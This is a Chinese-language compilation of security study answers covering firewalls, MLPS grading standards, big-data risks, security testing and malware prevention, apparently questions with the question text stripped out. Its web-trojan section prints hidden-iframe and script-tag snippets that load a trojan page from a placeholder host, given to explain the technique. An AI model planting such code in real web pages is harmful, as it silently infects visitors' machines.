要獲取更高級認證保護可以從以下方面入手:
登陸外部環境:設備的硬件指紋是根據用戶登陸設備的多個硬件信息單向計算的一個字符串,瀏覽器也有相應的指紋信息。一般來說,用戶的使用設備不會快速變化,只要收集到常用設備信息,即可對用戶的異常行為作出反應;
對產品使用行為分析:例常用的活躍時間段、常用的操作行為相似度、固定登陸設備信息、操作系統的激活ID變化、常用登陸地等信息,可以使用動態評分的方式探知用戶的使用行為的異常變化,從而判斷用戶是否異常;
可疑會話管理:這是一種讓賬號持有者主動介入到安全管理行為中來的方式。在用戶登陸成功后,系統可以讓賬戶所有者、管理員看到當前已登陸的會話列表,如果查看者發現異常,可以手動登出相應的會話,提升賬戶安全性;
密碼泄漏預警:安全系統可以定期對已知的可能泄露賬號進行監控,并且和系統內的密碼進行比對,如果發現異常則可以提醒或強制用戶修改密碼;
危險行為審計:用戶進行關鍵的操作時,必要時進行另外的管理賬戶介入審計從而確保系統的安全性。
常用的軟件安全性測試方法有以下這些:
基于故障樹分析的安全性測試方法:基于故障樹分析的軟件安全性測試方法是利用故障樹的最小割集來生成軟件安全性測試用例的方法。它以系統中最不希望發生的故障狀態作為故障分析的頂事件,尋找導致這一故障發生的全部可能因素,繪制故障樹,然后搜索出最小割集,并以最小割集為依據生成軟件安全性測試用例。
基于Petri網的安全性測試方法:基于Petri網的軟件安全性測試方法主要有正向分析法和逆向分析法。正向分析法首先建立完整的可達圖和狀態標識表,得到Petri網的可達集,建立相應的Petri網模型,然后在可達集中搜索所有包含任意一個狀態的狀態標識,并將其標記為危險標識,從初始狀態到該危險標識的每個變遷序列均可設計為一個測試用例。
基于故障注入的安全性測試:軟件故障注入可以有效地模擬各種各樣的異常程序行為,通過故障注入方法能夠強制性地使程序進入到某些特定的狀態,而這些狀態在采用常規的標準測試技術的情況下,一般是無法到達的。軟件故障注入針對應用與環境的交互點,主要包括用戶輸入、文件系統、網絡接口和環境變量等引起的故障。
模糊測試:模糊測試是一種通過向目標系統提供非預期的輸入并監視異常結果來發現軟件安全漏洞的方法。模糊測試將隨機數據插入程序,觀察其是否能夠容忍雜亂輸入。模糊測試是不合邏輯的,只是產生雜亂數據攻擊程序。采用模糊測試攻擊程序可以發現其他采用邏輯思維來測試難以發現的安全缺陷。
基于風險的安全測試:基于風險的安全測試方法是將風險分析、安全測試與軟件開發過程結合起來,盡可能早地發現高風險的安全漏洞。這種方法強調在軟件開發的各個階段進行誤用模式、異常場景、風險分析以及滲透測試等,測試不再是軟件發布后打補丁,而是將安全測試相關過程集成到軟件開發生命周期中。
USB Key存在的主要安全風險包括以下三個方面:
個人識別密碼(PIN碼) 存在被獲取的風險,可導致攻擊者獲取USB Key的使用權限。
私鑰存在被獲取,算改的風險,可導致USB Key被隨意復制。
USB密鑰存在被黑客遠程劫持的風險,使用戶在不知情的情況下使用USB密鑰內部私鑰進行加解密計算,達到偽造簽名的攻擊目的。
傳統防火墻采用的主要技術有:
包過濾技術:其原理在于監視并過濾網絡上流入流出的包,拒絕發送那些可疑的包。由于包過濾技術無法有效地區分相同IP地址的不同用戶,安全性相對較差。
代理服務技術:其原理是在網關計算機上運行應用代理程序,運行時由兩部分連接構成:一部分是應用網關同內部網用戶計算機建立的連接,另一部分是代替原來的客戶程序與服務器建立的連接。通過代理服務,內部網用戶可以通過應用網關安全地使用Internet服務,而對于非法用戶的請求將予拒絕。代理服務技術與包過濾技術不同之處,在于內部網和外部網之間不存在直接連接,同時提供審計和日志服務。
網絡地址轉換技術:其原理如同電話交換總機,當不同的內部網絡用戶向外連接時,使用相同的IP地址(總機號碼);內部網絡用戶互相通信時則使用內部IP地址(分機號碼)。內部網絡對外部網絡來說是不可見的,防火墻能詳盡記錄每一個內部網計算機的通信,確保每個數據包的正確傳送。
虛擬專用網VPN技術:虛擬專用網(VPN)是局域網在廣域網上的擴展,是專用計算機網絡在Internet上的延伸。VPN通過專用隧道技術在公共網絡上仿真一條點到點的專線,實現安全的信息傳輸。雖然VPN不是真正的專用網絡,但卻能夠實現專用網絡的功能。
審計技術:通過對網絡上發生的各種訪問過程進行記錄和產生日志,并對日志進行統計處理,從而對網絡資源的使用情況進行分析,對異常現象進行追蹤監視。
信息加密技術:加密路由器對路由的信息進行加密處理,然后通過Internet傳輸到目的端進行解密。
“APT攻擊網絡戰預警平臺”,該產品是一款以檢測新型高級網絡攻擊為目標的產品,其檢測的深度遠超IDS、IPS等傳統設備,能夠對Web攻擊進行行為分析、文件攻擊及郵件攻擊進行深度檢測,能夠及時準確的檢測發現針對各類系統發起的0day攻擊。
APT攻擊作為一種高效、精確的網絡攻擊方式,在近幾年被頻繁用于各種網絡攻擊事件之中,網絡上的APT攻擊瞄準的是企業、政府、軍隊和高價值的個人,駭客早也不再以掛黑頁炫耀為目的,攻擊者可能通過該漏洞作為突破口滲透進入其內部網絡長期蟄伏,不斷收集各種信息,直到收集到重要情報。
企業部署大數據面臨的數據安全風險體現在以下方面:
大量數據的集中存儲增加了大數據泄露風險,大數據中心往往存儲海量的客戶信息、客戶的隱私和行為軌跡,這些數據的集中存儲增加了數據泄露風險;
海量數據本身就蘊藏著價值,但是如何將有用的數據與沒有價值的數據進行區分是一個棘手的問題,甚至引發越來越多的安全問題;
敏感數據的所有權和使用權并沒有被明確界定,敏感數據的共享與隔離存在風險,很多基于大數據的分析都未考慮到其中涉及的個體隱私問題,未考慮敏感數據屏蔽;
大數據對數據完整性、可用性和秘密性帶來挑戰,被濫用和被破壞的風險很高;
海量數據的集中存儲涉及如何防止數據丟失或者被誤刪除,同時數據容災、數據的備份與恢復等引入了新的技術難題;
隨著大數據存儲規模不斷擴大,集群冷熱數據分布會更加不均勻,如何管理數據生命周期也是一個挑戰;
如何進行大數據安全訪問控制、安全審計、安全監控也是一個難題。
等級測評主要依據《信息系統安全等級保護基本要求》GB/T22239和《信息系統安全等級保護測評要求》GB/T28448,兩個標準是配套使用的,基本要求是寫的各級別測評的具體要求有哪些,測評要求主要寫的是這個要求具體要怎么去測。但一些特定行業出了等保的行業標準,需要依據行業標準進行測評,如金融、證券、廣電、電力、醫院、電子政務外網、稅務等。
###《信息系統安全等級保護基本要求》GB/T22239
本標準規定了不同安全保護等級信息系統的基本保護要求,包括基本技術要求和基本管理要求,適用于指導分等級的信息系統的安全建設和監督管理。
信息系統安全等級保護應依據信息系統的安全保護等級情況保證它們具有相應等級的基本安全保護能力,不同安全保護等級的信息系統要求具有不同的安全保護能力。
基本安全要求是針對不同安全保護等級信息系統應該具有的基本安全保護能力提出的安全要求,根據實現方式的不同,基本安全要求分為基本技術要求和基本管理要求 兩大類。技術類安全要求與信息系統提供的技術安全機制有關,主要通過在信息系統中部署軟硬件并正確的配置其安全功能來實現;管理類安全要求與信息系統中各 種角色參與的活動有關,主要通過控制各種角色的活動,從政策、制度、規范、流程以及記錄等方面做出規定來實現。
基本技術要求從物理安全、網絡安全、主機安全、應用安全和數據安全幾個層面提出;基本管理要求從安全管理制度、安全管理機構、人員安全管理、系統建設管理和系統運維管理幾個方面提出,基本技術要求和基本管理要求是確保信息系統安全不可分割的兩個部分。
基 本安全要求從各個層面或方面提出了系統的每個組件應該滿足的安全要求,信息系統具有的整體安全保護能力通過不同組件實現基本安全要求來保證。除了保證系統 的每個組件滿足基本安全要求外,還要考慮組件之間的相互關系,來保證信息系統的整體安全保護能力。關于信息系統整體安全保護能力的說明見附錄A。
對于涉及國家秘密的信息系統,應按照國家保密工作部門的相關規定和標準進行保護。對于涉及密碼的使用和管理,應按照國家密碼管理的相關規定和標準實施。
###《信息系統安全等級保護測評要求》GB/T28448
本標準規定了不同級別的等級保護對象的安全測評通用要求和安全測評擴展要求。對第五級等級保護對象的安全測評要求不在本標準中描述。
本標準為安全測評服務機構、等級保護對象的運營使用單位及主管部門對等級保護對象的安全狀況進行安全測評提供指南,也可供網絡安全職能部門依法進行的網絡安全等級保護監督檢查參考使用。
等級測評實施的基本方法是針對特定的測評對象,采用相關的測評手段,遵從一定的測評規程,獲取需要的證據數據,給出是否達到特定級別安全保護能力的評判。等級測評實施的詳細流程和方法參見GB/T 28449—2018。
本標準中針對每一個要求項的測評就構成一個單項測評,針對某個要求項的所有具體測評內容構成測評實施。單項測評中的每一個具體測評實施要求項(以下簡稱“測評要求項”)是與安全控制點下面所包括的要求項(測評指標)相對應的。在對每一要求項進行測評時,可能用到訪談、核查和測試三種測評方法,也可能用到其中一種或兩種。測評實施的內容完全覆蓋了GB/T 22239—2018及GB/T 25070—2018中所有要求項的測評要求,使用時應當從單項測評的測評實施中抽取出對于GB/T 22239—2018中每一個要求項的測評要求,并按照這些測評要求開發測評指導書,以規范和指導等級測評活動。
根據調研結果,分析等級保護對象的業務流程和數據流,確定測評工作的范圍。結合等級保護對象的安全級別,綜合分析系統中各個設備和組件的功能和特性,從等級保護對象構成組件的重要性、安全性、共享性、全面性和恰當性等幾方面屬性確定技術層面的測評對象,并將與其相關的人員及管理文檔確定為管理層面的測評對象。測評對象可以根據類別加以描述,包括機房、業務應用軟件、主機操作系統、數據庫管理系統、網絡互聯設備、安全設備、訪談人員及安全管理文檔等。
網頁掛馬就是攻擊者通過在正常的頁面中(通常是網站的主頁)插入一段代碼。瀏覽者在打開該頁面的時候,這段代碼被執行,然后下載并運行某木馬的服務器端程序,進而控制瀏覽者的主機。網頁掛馬的類型:
框架嵌入式網絡掛馬
網頁木馬被攻擊者利用iframe語句,加載到任意網頁中都可執行的掛馬形式,是最早也是最有效的的一種網絡掛馬技術。通常的掛馬代碼如下:
< iframe arc = http://www/xxx/com/muma.html width = 0 height = 0 >< / iframe > 在打開插入該句代碼的網頁后,就也就打開了http://www.xxx.com/muma.html頁面,但是由于它的長和寬都為“0”,所以很難察覺,非常具有隱蔽性。
js調用型網頁掛馬
js掛馬是一種利用js腳本文件調用的原理進行的網頁木馬隱蔽掛馬技術,如:黑客先制作一個.js文件,然后利用js代碼調用到掛馬的網頁。通常代碼如下:
< script language = javascript arc = http://www.xxx.com/gm.js >< / script >
http://www.xxx.com/gm.js就是一個js腳本文件,通過它調用和執行木馬的服務端。這些js文件一般都可以通過工具生成,攻擊者只需輸入相關的選項就可以了。
圖片偽裝掛馬
攻擊者利用黑客工具軟件將網頁中的木馬代碼植入到圖片文件中,再利用代碼調用執行,是比較新穎的一種掛馬隱蔽方法。
攻擊者將類似:http://www.xxx.com/test.htm中的木馬代碼植入到test.gif圖片文件中,這些嵌入代碼的圖片都可以用工具生成,攻擊者只需輸入相關的選項就可以了。
網絡釣魚掛馬(也稱為偽裝調用掛馬)
網絡中最常見的欺騙手段,黑客們利用人們的獵奇、貪心等心理偽裝構造一個鏈接或者一個網頁,利用社會工程學欺騙方法,引誘點擊,當用戶打開一個看似正常的頁面時,網頁代碼隨之運行,隱蔽性極高。這種方式往往和欺騙用戶輸入某些個人隱私信息,然后竊取個人隱私相關聯。
高級欺騙,黑客利用IE或者Fixfox瀏覽器的設計缺陷制造的一種高級欺騙技術,當用戶訪問木馬頁面時地址欄顯示用戶信任地址,其實卻打開了被掛馬的頁面,從而實現欺騙。
大數據業務流程中面臨以下安全風險:
在數據采集階段,系統可能會將用戶的關鍵隱私數據采集并流轉至系統的非信任區域,并因此失去對這些關鍵數據的控制,導致用戶隱私數據泄露等安全風險。
在數據存儲階段,由于用戶的所有關鍵數據的明文存儲,因此很可能存在數據被盜用、濫用情況,導致用戶隱私信息泄露。
在數據挖掘階段,對用戶數據分析結果使用的不可控性,在數據挖掘分析中會存在數據非授權訪問,并且在挖掘算法升級時,系統的操作維護動作還可能會將原始數據或加工數據直接丟棄,造成關鍵數據流失。
在數據應用階段,廣告投放過程和計費信任程度不可控,容易遭到釣魚攻擊花費過多。
數據交付過程中會存在不合規的數據挖掘結果發布,以及數據泄露后無法追溯取證等問題。
網絡隔離技術主要有以下類型:
雙機雙網:雙機雙網隔離技術方案是指通過配置兩臺計算機來分別連接內網和外網環境,再利用移動存儲設備來完成數據交互操作,然而這種技術方案會給后期系統維護帶來諸多不便,同時還存在成本上升、占用資源等缺點,而且通常效率也無法達到用戶的要求。
雙硬盤隔離:雙硬盤隔離技術方案的基本思想是通過在原有客戶機上添加一塊硬盤和隔離卡來實現內網和外網的物理隔離,并通過選擇啟動內網硬盤或外網硬盤來連接內網或外網網絡。由于這種隔離技術方案需要多添加一塊硬盤,所以對那些配置要求高的網絡而言,就造成了成本浪費,同時頻繁地關閉、啟動硬盤容易造成硬盤的損壞。
單硬盤隔離:單硬盤隔離技術方案的實現原理是從物理層上將客戶端的單個硬盤分割為公共和安全分區,并分別安裝兩套系統來實現內網和外網的隔離,這樣就具有了較好的可擴展性,但是也存在數據是否安全界定困難、不能同時訪問內、外兩個網絡等缺陷。
集線器級隔離:集線器級隔離技術方案的一個主要特征在客戶端只需使用一條網絡線就可以部署內網和外網,然后通過遠端切換器來選擇連接內、外雙網,避免了客戶端要用兩條網絡線來連接內、外網絡。
服務器端隔離:服務器端隔離技術方案的關鍵內容是在物理上沒有數據連通的內、外網絡下,如何快速、分時地處理和傳遞數據信息,該方案主要是通過采用復雜的軟、硬件技術手段來在服務器端實現數據信息過濾和傳輸任務,以達到隔離內、外網的目的。
防火墻的基本概念:
防火墻常見的功能如下:
限制未經授權的用戶訪問本企業的網絡和信息資源的措施,訪問者必需要能適用現行所有的服務和應用。網絡衛士防火墻支持多種應用、服務和協議,支持所有的 internet 服務,包括安全的 web 瀏覽器、電子郵件、ftp、telinet 及 rpc 和 udp 等,還支持如 oracle、sybase、 sql 服務器數據庫訪問和 real audio, vodlive netmeeting 和 internet phone 等這樣的多媒體應用及 internet 廣播服務;
提供基于狀態檢測技術的 ip 地址、端口、用戶和時間的管理控制;
訪問控制對象的多種定義方式支持多種方式定義訪問控制對象: ip/mask (如 202.100.100.0/24),ip 區間 (如 202.100.100.1-202.100 100 254),ip/mask 與通配符,ip 區間與通配符等,使配置防火墻的安全策略極為方便;
高效的 urt 和文件級細粒度應用層管理控制:應用層安全控制策略主要針對常用的網絡應用協議 http 和 ftp, 控制策略可以實現定義訪問源對象到目標對象間的常用協議命令通過防 火墻的權限,源對象可以是網段、主機。http 和 ftp 的協議端口用戶可根據實際情況在策略中定義,協議命令為 http 和 ftp 的主要常用命令。通過應用層策略實現了 url 和文件級的訪問控制。
ip 與用戶綁定:綁定一次性口令用戶到定義 IP 列表上;
支持流量管理;
防御功能:防 TCP、UDP 攻擊,抗 DDoS 攻擊,提供實時監控等。
有,且危害嚴重,在網絡中,當信息進行傳播的時候,可以利用工具,將網絡接口設置在監聽的模式,便可將網絡中正在傳播的信息截獲或者捕獲到,從而進行攻擊,黑客一般都是利用網絡監聽來截取用戶口令。尤其是真的服務器網絡的監控更為危險,因為服務器訪問者較多,一旦服務器出現問題則影響大量用戶。
降低計算機病毒和漏洞所造成危害的措施有以下這些:
安裝和維護防病毒軟件:防病毒軟件可識別惡意軟件并保護我們的計算機免受惡意軟件侵害。安裝來自信譽良好的供應商的防病毒軟件是預防和檢測感染的重要步驟。始終直接訪問供應商網站,而不是點擊廣告或電子郵件鏈接。由于攻擊者不斷地制造新病毒和其他形式的惡意代碼,因此保持我們使用的防病毒軟件保持最新非常重要。
謹慎使用鏈接和附件:在使用電子郵件和網絡瀏覽器時采取適當的預防措施以降低感染風險。警惕未經請求的電子郵件附件,并在單擊電子郵件鏈接時小心謹慎,即使它們貌似來自我們認識的人。
阻止彈出廣告:彈出窗口阻止程序禁用可能包含惡意代碼的窗口。大多數瀏覽器都有一個免費功能,可以啟用它來阻止彈出廣告。
使用權限有限的帳戶:瀏覽網頁時,使用權限有限的賬戶是一種很好的安全做法。如果我們確實受到感染,受限權限可防止惡意代碼傳播并升級到管理賬戶。
禁用外部媒體自動運行和自動播放功能:禁用自動運行和自動播放功能可防止感染惡意代碼的外部媒體在我們的計算機上自動運行。
更改密碼:如果我們認為我們的計算機受到感染,應該及時更改我們的密碼 (口令)。這包括可能已緩存在我們的網絡瀏覽器中的任何網站密碼。創建和使用強密碼,使攻擊者難以猜測。
保持軟件更新:在我們的計算機上安裝軟件補丁,這樣攻擊者就不會利用已知漏洞。如果可用,請考慮啟用自動更新。
資料備份:定期將我們的文檔、照片和重要電子郵件備份到云或外部硬盤驅動器。如果發生感染,我們的信息不會丟失。
安裝或啟用防火墻:防火墻可以通過在惡意流量進入我們的計算機之前阻止它來防止某些類型的感染。一些操作系統包括防火墻;如果我們使用的操作系統包含一個防火墻,請啟用它。
使用反間諜軟件工具:間諜軟件是一種常見的病毒源,但可以通過使用識別和刪除間諜軟件的程序來最大程度地減少感染。大多數防病毒軟件都包含反間諜軟件選項,確保啟用。
監控賬戶:尋找任何未經授權的使用或異常活動,尤其是銀行賬戶。如果我們發現未經授權或異常的活動,請立即聯系我們的賬戶提供商。
避免使用公共 Wi-Fi:不安全的公共 Wi-Fi 可能允許攻擊者攔截我們設備的網絡流量并訪問我們的個人信息。.
目前大部分企業涉及的是第二級和第三級等級保護,以下是一份關于等級保護二級和三級安全產品需求清單。
二級等保
◆ 安全通信網絡中通信傳輸加密的要求
◆ 安全區域邊界中邊界防護、訪問控制、入侵◆ 防范、惡意代碼防范的要求
◆ 安全區域邊界中安全審計對安全事件審計的要求
◆ 安全區域邊界中對重要用戶安全審計的要求
◆ 安全計算環境中對服務器身份鑒別的要求
◆ 安全計算環境中對服務器管理員安全審計的要求
◆ 安全計算環境中對服務器管理過程數據完整性的要求
◆ 安全計算環境中對數據庫安全審計的要求
◆ 安全區域邊界中對各類審計記錄進行備份的要求
◆ 安全計算環境中對各類設備和系統審計記錄進行備份的要求
三級等保
◆ 安全通信網絡中網絡架構對重要區域隔離的要求
◆ 安全通信網絡中通信傳輸加密的要求
◆ 安全區域邊界中邊界防護、訪問控制、入侵防范、惡意代碼防范的要求
◆ 安全區域邊界中安全審計對安全事件審計的要求
◆ 安全區域邊界中訪問控制對應用協議和應用內容實現訪問控制的要求
◆ 安全區域邊界中安全審計對安全事件審計的要求
◆ 安全區域邊界中對重要用戶安全審計的要求
◆ 安全計算環境中對服務器身份鑒別的要求
◆ 安全計算環境中對服務器管理員安全審計的要求
◆ 安全計算環境中對服務器管理過程數據完整性和保密性的要求
◆ 安全計算環境中對數據庫安全審計的要求
◆ 安全區域邊界中對各類審計記錄進行備份的要求
◆ 安全計算環境中對各類設備和系統審計記錄進行備份的要求
◆ 安全管理中心中對系統內所有審計數據進行集中匯總和分析的要求
◆ 安全計算環境中對各類設備和系統進行漏洞掃描和漏洞修復的要求
◆ 安全管理中心中對系統中各類安全事件進行識別、報警和分析的要求
防火墻可以防范流進他的網絡掃描行為,也可以防范一些常見的攻擊手段,防火墻還能防范特定端口的流出通信和封殺特洛伊木馬,防火墻最大的功能就是防范外部攻擊的同時還能防止內部的信息外泄,通過利用防火墻對內部網絡的劃分,可實現內部網重點網段的隔離,從而限制了局部重點或敏感網絡安全問題對全局網絡造成的影響。
防火墻主要功能如下:
包過濾
包過濾是防火墻所要實現的最基本功能,它可將不符合要求的包過濾掉。包過濾技術已經由原來的靜態包過濾發展到了動態包過濾,靜態包過濾只是在網絡層上對包的地址、端口等信息進行判定控制,而動態包過濾是在所有通信層上對包的狀態進行檢測分析,判斷包是否符合安全要求。動態包過濾技術支持多種協議和應用程序,易擴展、易實現。
審計和報警機制
審計是一種重要的安全措施,用以監控通信行為和完善安全策略,檢查安全漏洞和錯誤配置,并對入侵者起到一定的威懾作用。報警機制是在通信違反相關策略以后,以多種方式如聲音、郵件、電話、手機短信息及時報告給管理人員。防火墻的審計和報警機制在防火墻體系中是很重要的,只有有了審計和報警,管理人員才可能知道網絡是否受到了攻擊。
遠程管理
遠程管理是防火墻管理功能的擴展之一,也是非常實用的功能,防火墻是否具有這種遠程管理功能已成為選擇防火墻產品的重要參考指標之一。使用防火墻的遠程管理功能可以在辦公室直接管理托管在網絡運營部門的防火墻,甚至坐在家中就可以重新調整防火墻的安全規則和策略。
NAT
絕大多數防火墻都具有網絡地址轉換(NAT)功能。目前防火墻一般采用雙向NAT,即SNAT和DNAT。SNAT用于對內部網絡地址進行轉換,對外部網絡隱藏內部網絡的結構,使得對內部的攻擊更加困難;并可以節省IP資源,有利于降低成本。DNAT主要用于實現外網主機對內網和DMZ區主機的訪問。
代理
目前代理主要有如下兩種實現方式。分別是透明代理(Transparent proxy)和傳統代理。
MAC地址與IP地址的綁定
把MAC地址與IP地址綁定在一起,主要用于防止那些受到控制(不允許訪問外網)的內部用戶通過更換IP地址來訪問外網。
流量控制(帶寬管理)和統計分析、流量計費
流量控制可以分為基于IP地址的控制和基于用戶的控制。基于IP地址的控制是對通過防火墻各個網絡接口的流量進行控制,基于用戶的控制是通過用戶登錄來控制每個用戶的流量,從而防止某些應用或用戶占用過多的資源。并且通過流量控制可以保證重要用戶和重要接口的連接。
統計分析是建立在流量控制基礎之上的。一般防火墻通過對基于IP、服務、時間、協議等進行統計,并與管理界面實現掛接,實時或者以統計報表的形式輸出結果。流量計費因此也是非常容易實現的。
VPN
在以往的網絡安全產品中,VPN是一個單獨產品,現在大多數廠商把VPN與防火墻捆綁在一起,進一步增強和擴展了防火墻的功能,這也是一種產品整合的趨勢。
分布式,去中心化
由于使用分布式核算和存儲,不存在中心化的硬件或管理機構,任意節點的權利和義務都是均等的,系統中的數據塊由整個系統中具有維護功能的節點來共同維護。
開放性
系統是開放的,除了交易各方的私有信息被加密外,區塊鏈的數據對所有人公開,任何人都可以通過公開的接口查詢區塊鏈數據和開發相關應用,因此整個系統信息高度透明。
獨立性
基于協商一致的規范和協議(類似比特幣采用的哈希算法等各種數學算法),整個區塊鏈系統不依賴其他第三方,所有節點能夠在系統內自動安全地驗證、交換數據,不需要任何人為的干預。
自治性
區塊鏈采用基于協商一致的規范和協議(比如一套公開透明的算法)使得整個系統中的所有節點能夠在去信任的環境自由安全的交換數據,使得對“人”的信任改了對機器的信任,任何人為的干預不起作用。
匿名性
由于節點之間的交換遵循固定的算法,其數據交互是無需信任的(區塊鏈中的程序規則會自行判斷活動是否有效),因此交易對手無須通過公開身份的方式讓對方自己產生信任,對信用的累積非常有幫助。
